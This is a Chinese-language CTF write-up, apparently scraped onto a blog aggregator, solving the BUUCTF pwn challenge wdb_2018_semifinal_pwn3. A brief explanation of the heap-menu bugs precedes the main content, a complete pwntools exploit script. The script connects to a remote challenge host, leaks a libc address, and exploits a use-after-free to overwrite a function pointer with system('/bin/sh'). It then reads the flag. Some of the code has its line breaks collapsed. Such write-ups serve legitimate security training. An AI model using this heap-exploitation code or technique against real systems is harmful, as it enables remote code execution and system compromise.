生活随笔
收集整理的這篇文章主要介紹了
[BUUCTF-pwn] wdb_2018_semifinal_pwn3
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
代碼長是個大麻煩。
這個包含三個部分:
這個很標準的堆菜單,有add,free,show其中add的name部分用read讀入,size也沒有限制這塊管理塊0x30,content size可控mark這塊必需指到一個2的塊,free可2次,不清指針
其實只是代碼長而已
先用1建個x80 free以后再建由于read寫入不帶\0 寫8字符,然后show得到libc進入1337菜單 先建個2類塊(mark要用這個編號)建個3類塊(x18+x20,管理塊里包含函數指針)free掉,這里不清指針再建個2類塊(x30+x18)將數據寫到原3類塊的管理塊里寫入/bin/sh,systemshow_mark(0)得到shell
from pwn import *local = 0
if local == 1:p = process('./pwn')
else:p = remote('node4.buuoj.cn', 28718) libc_elf = ELF('../buuoj_2.23_amd64/libc6_2.23-0ubuntu10_amd64.so')
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147 ]
libc_start_main_ret = 0x20830elf = ELF('./pwn')
context.arch = 'amd64'
context.log_level = 'debug'menu = b"Your choice : "
def add(size, name, msg):p.sendlineafter(menu, b'1')p.sendlineafter(b"Length of the name :", str(size).encode())p.sendafter(b"The name of character :", name)p.sendlineafter(b"The type of the character :", msg)def show(): p.sendlineafter(menu, b'2')def free_name(idx):p.sendlineafter(menu, b'3')p.sendlineafter(b"Which character do you want to eat:", str(idx).encode())def free():p.sendlineafter(menu, b'4')add(0x80, b'A', b'A')
add(0x28, b'B', b'B')
free_name(0)
free()
add(0x80, b'A'*8, b'A')
show()
p.recvuntil(b'A'*8)libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - 0x58 -0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
one_gadget = libc_base + one[0]menu2 = b'$ '
def add2(size, name, msg):p.sendlineafter(menu2, b'new')p.sendlineafter(b"$ note size:", str(size).encode())p.sendlineafter(b"$ note name:", name)p.sendafter(b"$ note content:", msg)def addmark(idx, msg): #x18 cnt,id,ptr->x20, funcp.sendlineafter(menu2, b'mark')p.sendlineafter(b"$ index of note you want to mark:", str(idx).encode())p.sendlineafter(b"$ mark info:", msg)def freemark(idx):p.sendlineafter(menu2, b'delete_mark')p.sendlineafter(b"$ mark index:", str(idx).encode())def showmark(idx):p.sendlineafter(menu2, b'show_mark')p.sendlineafter(b"$ mark index:", str(idx).encode())p.sendlineafter(menu, b'1337')add2(0x18, b'A', b'A\n') #2033c0[0]
addmark(0, b'A\n') #mark 0 203040[0]
freemark(0) #
add2(0x18, b'A', p32(1)+p32(0x18) + p64(next(libc_elf.search(b'/bin/sh')))+p64(libc_elf.sym['system']))
showmark(0)p.sendline(b'cat /flag')
p.interactive()
總結
以上是生活随笔為你收集整理的[BUUCTF-pwn] wdb_2018_semifinal_pwn3的全部內容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。
